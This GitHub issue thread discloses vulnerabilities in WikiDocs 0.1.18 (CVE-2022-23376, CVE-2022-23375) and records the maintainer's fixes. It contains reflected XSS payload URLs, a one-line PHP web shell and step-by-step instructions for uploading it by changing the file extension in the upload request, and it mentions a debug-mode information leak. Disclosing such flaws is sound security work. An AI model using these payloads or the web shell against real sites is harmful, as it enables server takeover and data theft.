Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple Vulnerabilities in WikiDocs 0.1.18 #28

Closed
nam3lum opened this issue Feb 19, 2022 · 8 comments
Closed

Multiple Vulnerabilities in WikiDocs 0.1.18 #28

nam3lum opened this issue Feb 19, 2022 · 8 comments
Assignees
Labels
bug Something isn't working
Milestone

Comments

@nam3lum
Copy link

nam3lum commented Feb 19, 2022

CVE-2022-23376 / Multiple reflected XSS vulnerabilities on different pages.

1. (Template.inc.php) - Reflected XSS Injection

First vulnerability in line 47:
image
Second is in line 210:
image
XSS directly using url: https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E

2. (Submit.php) - Reflected XSS Injection

Vulnerability in line 31:
image
XSS directly using url: https://www.wikidocs.it/submit.php?act=%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E

3. (Index.php) - Reflected Xss Injection:

image

CVE-2022-23375 / Authenticated remote code execution vulnerability

(Index.php) - Image upload, Authenticated Remote Code Execution:

first, log in to the website and click edit button on the right top:
image
Before upload proccess, we have to create malicious payload image:
image
name: shell.php.png
payload :

<?php echo system($_REQUEST['cmd']); ?>

After that, you have to click image button on top and upload image:
image
Select malicious file and click upload:
image
In upload process, change file extension to the PHP in the POST request:
image
then the browser automatically sends another request to the malicious file:
image
Just browse it and try to execute some commands:
image

Information Disclosure Vulnerability (I did not reserve CVE for this one)

(Functions.inc.php) - Debug mode can be enabled:

Vulnerable lines are between 15-18:
image
You can get sensitive information using debug mode:
image

I hope you wil close these vulnerabilities ASAP.

@Zavy86
Copy link
Owner

Zavy86 commented Feb 21, 2022

hi @nam3lum, thanks for the reports. I will provide as soon as possible ..

@Zavy86 Zavy86 added the bug Something isn't working label Feb 21, 2022
@Zavy86 Zavy86 added this to the Release 1.0.0 milestone Feb 21, 2022
@Zavy86
Copy link
Owner

Zavy86 commented Feb 21, 2022

In version 0.1.20 I tried to fix the shell bug. Can you check if you can still hack it?

@nam3lum
Copy link
Author

nam3lum commented Feb 22, 2022

Actually, your application is more secure right now because it does not accept any extension 😃
image

@Zavy86
Copy link
Owner

Zavy86 commented Feb 22, 2022

Ok, can you try now please.. :) v0.1.21

@Zavy86
Copy link
Owner

Zavy86 commented Feb 22, 2022

Parameter for enable and disable debug mode for Information Disclosure Vulnerability. v0.2.1

@Zavy86 Zavy86 removed this from the Release 1.0.0 milestone Feb 22, 2022
@Zavy86 Zavy86 self-assigned this Feb 22, 2022
@Zavy86 Zavy86 pinned this issue Feb 22, 2022
@Zavy86 Zavy86 removed their assignment Sep 19, 2022
@Zavy86 Zavy86 added this to the Release 1.0.0 milestone May 4, 2023
@Zavy86 Zavy86 self-assigned this May 4, 2023
@Zavy86
Copy link
Owner

Zavy86 commented May 4, 2023

fixed in refactored, release version up to 0.5.0

@Zavy86 Zavy86 closed this as completed May 4, 2023
@Zavy86 Zavy86 unpinned this issue May 4, 2023
@Zavy86
Copy link
Owner

Zavy86 commented May 10, 2023

@nam3lum

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants